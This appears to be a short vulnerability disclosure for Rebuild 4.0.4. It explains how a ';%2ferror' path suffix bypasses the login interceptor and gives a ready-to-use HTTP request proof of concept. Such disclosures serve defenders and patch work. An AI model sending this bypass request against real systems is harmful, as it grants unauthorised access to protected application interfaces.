4.0.4The affected source code class is com.rebuild.web.RebuildWebInterceptor, and the affected function is preHandle In the filter code, use CodecUtils.*urlDecode*(request.getRequestURI()) to obtain the URL-decoded request path, and then determine whether the path endsWith /error. If so, execute return true to skip this Interceptor. Else, redirect to /user/login api.
CodecUtils.urlDecode(request.getRequestURI()) to obtain the URL-decoded request path. The path obtained by this function will not parse special symbols, but will be passed on directly. Although there is a .. check operation, but we can use ; to bypass it, e.g. ;%2ferror.Taking one of the backend interfaces /commons/ip-location as an example, using /commons/ip-location;%2ferror can make it satisfy requestUri.endsWith("/error"), and at the same time, it can request the ip-location interface to achieve login bypass.
POC:
GET /commons/ip-location;%2ferror?ip=https://www.baidu.com/
HTTP/1.1
Host: 127.0.0.1:18080
User-Agent: Apifox/1.0.0 ([<https://apifox.com>](<https://apifox.com/>))
Accept: */*
Host: 127.0.0.1:18080
Connection: keep-alive
Cookie: RBSESSION=BD2D43DAEC4D8FDDE94D9573C26EF2C7